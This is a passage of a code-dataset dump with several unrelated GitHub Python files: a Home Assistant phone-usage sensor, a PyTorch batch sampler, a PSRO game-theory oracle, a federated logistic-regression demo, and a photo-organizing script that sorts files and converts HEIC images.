async_added_to_hass(self):\n\t\t\"\"\"When entity is added to hass.\"\"\"\n\t\tself.async_on_remove(\n\t\t\tself._coordinator.async_add_listener(\n\t\t\t\tself.async_write_ha_state\n\t\t\t)\n\t\t)\n\nclass DataSensor(SensorEntity):\n\tdef __init__(self, hass, coordinator, phoneNo, userName = '') -> None:\n\t\tself._hass = hass\n\t\tself._coordinator = coordinator\n\t\tself._phoneNo = phoneNo\n\t\tself._userName = userName\n\t\tself._client = hass.data[DOMAIN][CONF_CLIENT]\n\t\tself._name = DOMAIN + HA_SPACE + str(self._phoneNo) + HA_SPACE + R_DATA + HA_SPACE + HA_USED\n\t\tself._state = 0\n\t\tself._total = 0\n\t\tif R_DATA in self._client._packageAndConsumption[self._phoneNo][STR_USED]:\n\t\t\tself._state = self._client._packageAndConsumption[self._phoneNo][STR_USED][R_DATA]\n\t\tif R_DATA in self._client._packageAndConsumption[self._phoneNo][STR_PACKAGE]:\n\t\t\tself._total = self._client._packageAndConsumption[self._phoneNo][STR_PACKAGE][R_DATA]\n\n\t@property\n\tdef name(self) -> str:\n\t\treturn self._name\n\n\t@property\n\tdef state(self):\n\t\treturn self._state\n\n\t@property\n\tdef unit_of_measurement(self) -> str:\n\t\treturn HA_UNIT_OF_MEASUREMENT_DATA\n\n\t@property\n\tdef unique_id(self):\n\t\treturn self._name\n\n\t@property\n\tdef extra_state_attributes(self):\n\t\t# Prepare a dictionary with attributes\n\t\tattr = { ATTR_ATTRIBUTION: HA_ATTRIBUTION }\n\t\tattr[(R_DATA + HA_SPACE + HA_TOTAL).lower()] = self._total\n\t\tattr[HA_USERNAME] = self._userName\n\t\tattr[HA_PHONENUMBER] = self._phoneNo\n\t\tif R_DATE in self._client._packageAndConsumption[self._phoneNo]:\n\t\t\tattr[(R_DATE).lower()] = self._client._packageAndConsumption[self._phoneNo][R_DATE]\n\n\t\treturn attr\n\n\t@property\n\tdef should_poll(self):\n\t\t\"\"\"No need to poll. Coordinator notifies entity of updates.\"\"\"\n\t\treturn False\n\n\t@property\n\tdef available(self):\n\t\t\"\"\"Return if entity is available.\"\"\"\n\t\treturn self._coordinator.last_update_success\n\n\tasync def async_update(self):\n\t\t\"\"\"Update the entity. Only used by the generic entity update service.\"\"\"\n\t\tawait self._coordinator.async_request_refresh()\n\n\tasync def async_added_to_hass(self):\n\t\t\"\"\"When entity is added to hass.\"\"\"\n\t\tself.async_on_remove(\n\t\t\tself._coordinator.async_add_listener(\n\t\t\t\tself.async_write_ha_state\n\t\t\t)\n\t\t)", "repo_name": "J-Lindvig/HomeAssistant", "sub_path": "custom_components/greentel/sensor.py", "file_name": "sensor.py", "file_ext": "py", "file_size_in_byte": 6227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.Logger", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 37, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 44, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 44, "usage_type": "name"}, {"api_name": "homeassistant.helpers.update_coordinator.DataUpdateCoordinator", "line_number": 49, "usage_type": "call"}, {"api_name": "const.CONF_PLATFORM", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 54, "usage_type": "call"}, {"api_name": "const.UPDATE_INTERVAL", "line_number": 54, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 61, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 61, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 67, "usage_type": "name"}, {"api_name": "const.CONF_SEPARATE_DATA_SENSORS", "line_number": 67, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorEntity", "line_number": 73, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 78, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 78, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 82, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 82, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 83, "usage_type": "name"}, {"api_name": "const.STR_NAME", "line_number": 84, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 86, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 86, "usage_type": "name"}, {"api_name": "const.R_BALANCE", "line_number": 91, "usage_type": "name"}, {"api_name": "const.HA_UNIT_OF_MEASUREMENT_SUBSCRIPTION", "line_number": 95, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 99, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 99, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 99, "usage_type": "name"}, {"api_name": "homeassistant.const.DEVICE_CLASS_MONETARY", "line_number": 103, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_ATTRIBUTION", "line_number": 108, "usage_type": "name"}, {"api_name": "const.HA_USERS", "line_number": 108, "usage_type": "name"}, {"api_name": "const.HA_ATTRIBUTION", "line_number": 108, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 111, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 112, "usage_type": "name"}, {"api_name": "const.HA_USERS", "line_number": 113, "usage_type": "name"}, {"api_name": "const.HA_USERNAME", "line_number": 113, "usage_type": "name"}, {"api_name": "const.HA_PHONENUMBER", "line_number": 113, "usage_type": "name"}, {"api_name": "const.R_USERNAME", "line_number": 113, "usage_type": "name"}, {"api_name": "const.R_DATE", "line_number": 114, "usage_type": "name"}, {"api_name": "const.HA_LAST_RECORD", "line_number": 115, "usage_type": "name"}, {"api_name": "const.R_DATE", "line_number": 115, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 116, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 117, "usage_type": "name"}, {"api_name": "const.HA_USED", "line_number": 117, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 120, "usage_type": "name"}, {"api_name": "const.STR_USERS", "line_number": 123, "usage_type": "name"}, {"api_name": "const.R_PHONENUMBER", "line_number": 123, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 124, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 125, "usage_type": "name"}, {"api_name": "const.HA_TOTAL", "line_number": 125, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 125, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorEntity", "line_number": 151, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 157, "usage_type": "name"}, {"api_name": "const.CONF_CLIENT", "line_number": 157, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 158, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 158, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 158, "usage_type": "name"}, {"api_name": "const.HA_USED", "line_number": 158, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 161, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 161, "usage_type": "name"}, {"api_name": "const.STR_USED", "line_number": 162, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 162, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 163, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 163, "usage_type": "name"}, {"api_name": "const.STR_PACKAGE", "line_number": 164, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 164, "usage_type": "name"}, {"api_name": "const.HA_UNIT_OF_MEASUREMENT_DATA", "line_number": 176, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_ATTRIBUTION", "line_number": 185, "usage_type": "name"}, {"api_name": "const.HA_ATTRIBUTION", "line_number": 185, "usage_type": "name"}, {"api_name": "const.R_DATA", "line_number": 186, "usage_type": "name"}, {"api_name": "const.HA_SPACE", "line_number": 186, "usage_type": "name"}, {"api_name": "const.HA_TOTAL", "line_number": 186, "usage_type": "name"}, {"api_name": "const.HA_USERNAME", "line_number": 187, "usage_type": "name"}, {"api_name": "const.HA_PHONENUMBER", "line_number": 188, "usage_type": "name"}, {"api_name": "const.R_DATE", "line_number": 189, "usage_type": "name"}, {"api_name": "const.R_DATE.lower", "line_number": 190, "usage_type": "call"}, {"api_name": "const.R_DATE", "line_number": 190, "usage_type": "name"}]} +{"seq_id": "39680638192", "text": "from typing import List, Optional\n\nimport numpy as np\nfrom torch.utils.data.sampler import Sampler\n\nfrom aikido.__api__.kata import LabelAware\n\n\nclass BalancedBatchSampler(Sampler[List[int]]):\n \"\"\"\n tbd\n \"\"\"\n\n def __init__(self, kata: LabelAware, n_classes, n_samples, seed: Optional[int] = None):\n super().__init__(kata)\n self.random_state = np.random.RandomState(seed)\n self.labels = kata.get_labels()\n self.labels_set = list(set(np.array(self.labels)))\n self.label_to_indices = {label: np.where(np.array(self.labels) == label)[0]\n for label in self.labels_set}\n for l in self.labels_set:\n self.random_state.shuffle(self.label_to_indices[l])\n self.used_label_indices_count = {label: 0 for label in self.labels_set}\n self.count = 0\n self.n_classes = n_classes\n self.n_samples = n_samples\n self.n_dataset = len(self.labels)\n self.batch_size = self.n_samples * self.n_classes\n\n def __iter__(self):\n self.count = 0\n while self.count + self.batch_size < self.n_dataset:\n classes = self.random_state.choice(self.labels_set, self.n_classes, replace=False)\n indices = []\n for class_ in classes:\n indices.extend(self.label_to_indices[class_][\n self.used_label_indices_count[class_]:self.used_label_indices_count[\n class_] + self.n_samples])\n self.used_label_indices_count[class_] += self.n_samples\n if self.used_label_indices_count[class_] + self.n_samples > len(self.label_to_indices[class_]):\n np.random.shuffle(self.label_to_indices[class_])\n self.used_label_indices_count[class_] = 0\n\n while len(indices) < self.batch_size:\n indices.append(self.random_state.choice(indices))\n\n yield indices\n self.count += self.n_classes * self.n_samples\n\n def __len__(self):\n return self.n_dataset // self.batch_size\n", "repo_name": "c7nw3r/aikido", "sub_path": "aikido/kata/sampler/balanced_batch_sampler.py", "file_name": "balanced_batch_sampler.py", "file_ext": "py", "file_size_in_byte": 2130, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.utils.data.sampler.Sampler", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 9, "usage_type": "name"}, {"api_name": "aikido.__api__.kata.LabelAware", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 14, "usage_type": "name"}, {"api_name": "numpy.random.RandomState", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "20404762564", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n# from open_spiel.python.algorithms.psro_variations import abstract_meta_trainer\nimport abstract_meta_trainer\nfrom sklearn import preprocessing\nimport itertools\n\n\nclass AbstractOracle(object):\n \"\"\"The abstract class representing oracles, a hidden optimization process.\"\"\"\n\n def __init__(self,\n number_policies_sampled=100,\n number_episodes_sampled=10,\n nb_players=2,\n **unused_oracle_specific_kwargs):\n \"\"\"Initialization method for oracle.\n Args:\n number_policies_sampled: Number of different opponent policies sampled\n during evaluation of policy.\n number_episodes_sampled: Number of episodes sampled to estimate the return\n of different opponent policies.\n **unused_oracle_specific_kwargs: Oracle specific args, compatibility\n purpose. Since oracles can vary so much in their implementation, no\n specific argument constraint is put on this function.\n \"\"\"\n self._number_policies_sampled = number_policies_sampled\n self._number_episodes_sampled = number_episodes_sampled\n self.l_card = [[] for _ in range(nb_players)]\n self.nb_players = nb_players\n\n def set_iteration_numbers(self, number_policies_sampled,\n number_episodes_sampled):\n \"\"\"Changes the number of iterations used for computing episode returns.\n Args:\n number_policies_sampled: Number of different opponent policies sampled\n during evaluation of policy.\n number_episodes_sampled: Number of episodes sampled to estimate the return\n of different opponent policies.\n \"\"\"\n self._number_policies_sampled = number_policies_sampled\n self._number_episodes_sampled = number_episodes_sampled\n\n def __call__(self, game, policy, total_policies, current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs):\n \"\"\"Call method for oracle, returns best response against a set of policies.\n Args:\n game: The game on which the optimization process takes place.\n policy: The current policy, in policy.Policy, from which we wish to start\n optimizing.\n total_policies: A list of all policy.Policy strategies used for training,\n including the one for the current player.\n current_player: Integer representing the current player.\n probabilities_of_playing_policies: A list of arrays representing, per\n player, the probabilities of playing each policy in total_policies for\n the same player.\n **oracle_specific_execution_kwargs: Other set of arguments, for\n compatibility purposes. Can for example represent whether to Rectify\n Training or not.\n \"\"\"\n raise NotImplementedError(\"Calling Abstract class method.\")\n\n def evaluate_policy(self, game, pol, total_policies, current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs):\n \"\"\"Evaluates a specific policy against a nash mixture of policies.\n Args:\n game: The game on which the optimization process takes place.\n pol: The current policy, in policy.Policy, from which we wish to start\n optimizing.\n total_policies: A list of all policy.Policy strategies used for training,\n including the one for the current player.\n current_player: Integer representing the current player.\n probabilities_of_playing_policies: A list of arrays representing, per\n player, the probabilities of playing each policy in total_policies for\n the same player.\n **oracle_specific_execution_kwargs: Other set of arguments, for\n compatibility purposes. Can for example represent whether to Rectify\n Training or not.\n Returns:\n Average return for policy when played against policies_played_against.\n \"\"\"\n rectify_training = oracle_specific_execution_kwargs.get(\"rectify_training\")\n\n totals = 0\n count = 0\n for _ in range(self._number_policies_sampled):\n # For Rectified Nash, it's necessary to make sure that we're only\n # including policies against which the evaluated policy wins on\n # expectation, which forces us to make multiple runs per policy.\n\n policies_selected = []\n for k in range(len(total_policies)):\n if k == current_player:\n policies_selected.append(pol)\n else:\n selected_opponent = np.random.choice(\n total_policies[k],\n 1,\n False,\n p=probabilities_of_playing_policies[k]).reshape(-1)[0]\n policies_selected.append(selected_opponent)\n\n policy_total = 0\n for _ in range(self._number_episodes_sampled):\n new_return = abstract_meta_trainer.sample_episode(\n game.new_initial_state(),\n policies_selected).reshape(-1)[current_player]\n policy_total += new_return\n policy_total /= self._number_episodes_sampled\n\n if rectify_training:\n gain_on_average = int(policy_total >= 0)\n policy_total = gain_on_average * policy_total\n add_counter = gain_on_average\n else:\n add_counter = 1\n\n totals += policy_total\n count += add_counter\n\n # Avoid the 0 / 0 case.\n return totals / max(1, count)\n\n\nclass EvolutionaryStrategyOracle(AbstractOracle):\n \"\"\"Oracle using evolutionary strategies to compute BR to policies.\"\"\"\n\n def __init__(self, alpha=0.1, beta=10, n_evolution_tests=100, **kwargs):\n self._alpha = alpha\n self._beta = beta\n self._n_evolution_tests = n_evolution_tests\n super(EvolutionaryStrategyOracle, self).__init__(**kwargs)\n\n def __call__(self, game, pol, total_policies, current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs):\n \"\"\"Call method for oracle, returns best response against a set of policies.\n Args:\n game: The game on which the optimization process takes place.\n pol: The current policy, in policy.Policy, from which we wish to start\n optimizing.\n total_policies: A list of all policy.Policy strategies used for training,\n including the one for the current player.\n current_player: Integer representing the current player.\n probabilities_of_playing_policies: A list of arrays representing, per\n player, the probabilities of playing each policy in total_policies for\n the same player.\n **oracle_specific_execution_kwargs: Other set of arguments, for\n compatibility purposes. Can for example represent whether to Rectify\n Training or not.\n Returns:\n Expected (Epsilon) best response.\n \"\"\"\n max_perf = -np.infty\n best_policy = None\n # Easy to multithread, but this is python.\n for _ in range(self._n_evolution_tests):\n new_policy = pol.copy_with_noise(alpha=self._alpha, beta=self._beta)\n new_value = self.evaluate_policy(game, new_policy, total_policies,\n current_player,\n probabilities_of_playing_policies,\n **oracle_specific_execution_kwargs)\n\n lambda_weight = oracle_specific_execution_kwargs.get(\"lambda_weight\")\n solver = oracle_specific_execution_kwargs.get(\"solver\")\n\n # Update metagame with new policy\n new_policies = [[] for _ in range(2)]\n new_policies[current_player] = [new_policy]\n meta_games = self.update_metagame(solver, new_policies)\n M = meta_games[current_player]\n\n # Compute cardinality\n M = preprocessing.normalize(M, norm='l2', axis=1) # Normalise\n L = M @ M.T # Compute kernel\n L_card = np.trace(np.eye(L.shape[0]) - np.linalg.inv(L + np.eye(L.shape[0]))) # Compute cardinality\n\n new_value = lambda_weight*new_value + (1-lambda_weight)*L_card\n\n if new_value > max_perf:\n max_perf = new_value\n best_policy = new_policy\n self.l_card[current_player] = L_card\n\n return best_policy\n \n \n def update_metagame(self, solver, new_policies, seed=None):\n \"\"\"Given new agents in _new_policies, update meta_games through simulations.\n Args:\n seed: Seed for environment generation.\n Returns:\n Meta game payoff matrix.\n \"\"\"\n if seed is not None:\n np.random.seed(seed=seed)\n\n # Concatenate both lists.\n updated_policies = [\n solver._policies[k] + new_policies[k]\n for k in range(solver._num_players)\n ]\n\n # Each metagame will be (num_strategies)^self._num_players.\n # There are self._num_player metagames, one per player.\n total_number_policies = [\n len(updated_policies[k]) for k in range(solver._num_players)\n ]\n number_older_policies = [\n len(solver._policies[k]) for k in range(solver._num_players)\n ]\n number_new_policies = [\n len(new_policies[k]) for k in range(solver._num_players)\n ]\n\n # Initializing the matrix with nans to recognize unestimated states.\n meta_games = [\n np.full(tuple(total_number_policies), np.nan)\n for k in range(solver._num_players)\n ]\n\n # Filling the matrix with already-known values.\n older_policies_slice = tuple(\n [slice(len(solver._policies[k])) for k in range(solver._num_players)])\n for k in range(solver._num_players):\n meta_games[k][older_policies_slice] = solver._meta_games[k]\n\n # Filling the matrix for newly added policies.\n for current_player in range(solver._num_players):\n # Only iterate over new policies for current player ; compute on every\n # policy for the other players.\n range_iterators = [\n range(total_number_policies[k]) for k in range(current_player)\n ] + [range(number_new_policies[current_player])] + [\n range(total_number_policies[k])\n for k in range(current_player + 1, solver._num_players)\n ]\n for current_index in itertools.product(*range_iterators):\n used_index = list(current_index)\n used_index[current_player] += number_older_policies[current_player]\n if np.isnan(meta_games[current_player][tuple(used_index)]):\n estimated_policies = [\n updated_policies[k][current_index[k]]\n for k in range(current_player)\n ] + [\n new_policies[current_player][current_index[current_player]]\n ] + [\n updated_policies[k][current_index[k]]\n for k in range(current_player + 1, solver._num_players)\n ]\n utility_estimates = solver.sample_episodes(estimated_policies,\n solver._sims_per_entry)\n for k in range(solver._num_players):\n meta_games[k][tuple(used_index)] = utility_estimates[k]\n\n return meta_games\n", "repo_name": "oslumbers/msc_diversity_psro", "sub_path": "tic_tac_toe_small/optimization_oracle.py", "file_name": "optimization_oracle.py", "file_ext": "py", "file_size_in_byte": 10897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.choice", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 101, "usage_type": "attribute"}, {"api_name": "abstract_meta_trainer.sample_episode", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.infty", "line_number": 159, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 179, "usage_type": "name"}, {"api_name": "numpy.trace", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 181, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 223, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 246, "usage_type": "call"}]} +{"seq_id": "15056636439", "text": "from lr_trainer import vertical_logistic_regression, taylor_logistic_regression, normal_logistic_regression\nfrom sklearn.metrics import roc_auc_score\nfrom input_data import load_data, vertically_partition_data\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# 导入数据,将数据分成训练和测试集,并标准化\nX_train, y_train, X_test, y_test = load_data()\nprint(\"分割并标准化后的训练数据维度: {}行{}列\".format(X_train.shape[0], X_train.shape[1]))\n\n# 设置模型的配置参数\nconfig = {\n 'n_iter': 20, # 迭代次数\n 'eta': 0.05, # 学习率\n 'A_idx': [10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29], # PartyA 部分的特征索引\n 'B_idx': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9], # PartyB 部分的特征索引\n}\n\n# 将数据集分成 PartyA 和 PartyB 部分\nXA_train, XB_train, XA_test, XB_test = vertically_partition_data(X_train, X_test, config['A_idx'], config['B_idx'])\nprint('PartyA部分的数据规模:{}'.format(XA_train.shape))\nprint('PartyB部分的数据规模:{}'.format(XB_train.shape))\n\n# 开始训练\nfl_loss, fl_theta_a, fl_theta_b = vertical_logistic_regression(XA_train, XB_train, y_train, config)\nnorm_loss, normal_theta = normal_logistic_regression(X_train, y_train, X_test, y_test, config)\ntaylor_loss, taylor_theta = taylor_logistic_regression(X_train, y_train, X_test, y_test, config)\n\n# 绘制计算AUC以及准确率\n# 针对FL的LR,计算测试集上的prob\nfl_y_prob = 1/(1 + np.exp(-XA_test.dot(fl_theta_a) - XB_test.dot(fl_theta_b)))\ntaylor_y_prob = 1/(1 + np.exp(-X_test.dot(taylor_theta)))\nnormal_y_prob = 1/(1 + np.exp(-X_test.dot(normal_theta)))\n\nfl_y_train_prob = 1/(1 + np.exp(-XA_train.dot(fl_theta_a) - XB_train.dot(fl_theta_b)))\ntaylor_y_train_prob = 1/(1 + np.exp(-X_train.dot(taylor_theta)))\nnormal_y_train_prob = 1/(1 + np.exp(-X_train.dot(normal_theta)))\n\nprint(\"train fl lr auc\", roc_auc_score(y_train, fl_y_train_prob))\nprint(\"train taylor lr auc\", roc_auc_score(y_train, taylor_y_train_prob))\nprint(\"train normal lr auc\", roc_auc_score(y_train, normal_y_train_prob))\n\nprint(\"test fl lr auc\", roc_auc_score(y_test, fl_y_prob))\nprint(\"test taylor lr auc\", roc_auc_score(y_test, taylor_y_prob))\nprint(\"test normal lr auc\", roc_auc_score(y_test, normal_y_prob))\n\n\n# 展示拟合效果\n_ = plt.plot(range(len(taylor_loss)), taylor_loss, c=\"blue\",label=\"taylor lr loss\")\n_ = plt.plot(range(len(fl_loss)), fl_loss, label=\"vertical lr loss\")\n_ = plt.plot(range(len(norm_loss)), norm_loss, label=\"normal lr loss\")\n\nplt.xlabel(\"step\")\nplt.ylabel(\"loss value\")\nplt.legend(loc=\"upper right\")\n\nplt.show()", "repo_name": "HuangNing616/neo_fl", "sub_path": "fl_demo.py", "file_name": "fl_demo.py", "file_ext": "py", "file_size_in_byte": 2672, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "input_data.load_data", "line_number": 9, "usage_type": "call"}, {"api_name": "input_data.vertically_partition_data", "line_number": 21, "usage_type": "call"}, {"api_name": "lr_trainer.vertical_logistic_regression", "line_number": 26, "usage_type": "call"}, {"api_name": "lr_trainer.normal_logistic_regression", "line_number": 27, "usage_type": "call"}, {"api_name": "lr_trainer.taylor_logistic_regression", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "37042407119", "text": "import os\nimport shutil\nimport subprocess\nfrom datetime import datetime\nimport argparse\n\n\n# separate photos/video files by time\ndef separate_photos_by_time(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if is_image(file):\n creation_time = os.path.getmtime(file_path)\n time_object = datetime.fromtimestamp(creation_time)\n dest = os.path.join(\n root_dir, f\"{time_object.year:04d}-{time_object.month:02d}\"\n )\n if not os.path.exists(dest):\n os.makedirs(dest)\n shutil.move(file_path, os.path.join(dest, file))\n\n\n# separate photos by type (non-images are put into folder called 'video')\ndef separate_photos_by_type(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if is_image(file):\n extension = file.split(\".\")[-1].lower()\n dest = os.path.join(root_dir, extension)\n else: # video\n dest = os.path.join(root_dir, \"video\")\n\n if not os.path.exists(dest):\n os.makedirs(dest)\n shutil.move(file_path, os.path.join(dest, file))\n\n\n# convert HEIC to JPG\ndef convert_heic_to_jpg(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n if file.lower().endswith(\".heic\"):\n output_file_path = os.path.splitext(file_path)[0] + \".jpg\"\n subprocess.run([\"heif-convert\", file_path, output_file_path])\n os.remove(file_path)\n\n\n# check if the file is an image file\ndef is_image(filename):\n return any(\n filename.lower().endswith(extension)\n for extension in [\".arw\", \".jpg\", \".jpeg\", \".png\", \".heic\"]\n )\n\n\n# extract all content from subdirectories into the root directory\n# assumes that all files have different names\ndef extract_subdirectories(root_dir):\n for root, dirs, files in os.walk(root_dir):\n for file in files:\n file_path = os.path.join(root, file)\n shutil.move(file_path, root_dir, file)\n for root, dirs, files in os.walk(root_dir):\n for directory in dirs:\n if directory != root_dir:\n shutil.rmtree(os.path.join(root, directory))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Photo management automation script.\")\n parser.add_argument(\"--time\", action=\"store_true\", help=\"Separate photos by time\")\n parser.add_argument(\"--type\", action=\"store_true\", help=\"Separate photos by type\")\n parser.add_argument(\"--convert\", action=\"store_true\", help=\"Convert HEIC to JPG\")\n parser.add_argument(\n \"--extract\", action=\"store_true\", help=\"Extract all content from subdirectories\"\n )\n parser.add_argument(\"directory\", help=\"Directory path\")\n\n args = parser.parse_args()\n\n if os.path.isdir(args.directory):\n if args.extract:\n extract_subdirectories(args.directory)\n print(\"Extracted content from subdirectories.\")\n if args.convert:\n convert_heic_to_jpg(args.directory)\n print(\"Converted HEIC to JPG.\")\n if args.time:\n separate_photos_by_time(args.directory)\n print(\"Separated by time (yyyy-mm).\")\n if args.type:\n separate_photos_by_type(args.directory)\n print(\"Separated by file type.\")\n print(\"All done!\")\n else:\n print(\"Invalid directory path.\")\n", "repo_name": "irisxu02/photo-scripts", "sub_path": "organize.py", "file_name": "organize.py", "file_ext": "py", "file_size_in_byte": 3660, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.walk", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, 